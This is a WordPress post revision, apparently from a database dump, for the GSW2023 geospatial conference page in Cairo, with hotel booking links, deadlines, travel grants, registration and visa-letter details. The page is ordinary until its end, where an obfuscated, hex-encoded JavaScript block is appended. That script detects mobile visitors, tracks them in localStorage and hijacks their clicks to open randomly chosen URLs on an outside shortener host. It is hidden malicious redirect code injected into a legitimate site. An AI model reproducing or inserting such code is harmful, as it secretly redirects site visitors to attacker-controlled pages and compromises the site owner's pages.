css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1685735404108{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686317472179{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686320769324{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][vc_column width=\"1/2\"][vc_column_text]</p>\n<h2 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>Invitation letter</strong></span></h2>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>You will receive an invitation letter automatically once you provide your Name (as it appears in your passport), PassportNumber ,Nationality and Your Organization .</strong></span></p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong>If you require specific format for the Visa Letter, please Send email to </strong></span></p>\n<p style=\"text-align: center;\"><strong style=\"color: #ffffff;\"><span style=\"color: #ffff00;\"> <a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\">GSW-visa@gsw2023.com</a></span> to edit/add the text of the letter.</strong></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fvisa.gsw2023.com%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1686318545126{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Get Your Invitation letter[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-09 21:18:54','2023-06-09 21:18:54','',3066,'https://gsw2023.com/?p=4656',0,'revision','',0),
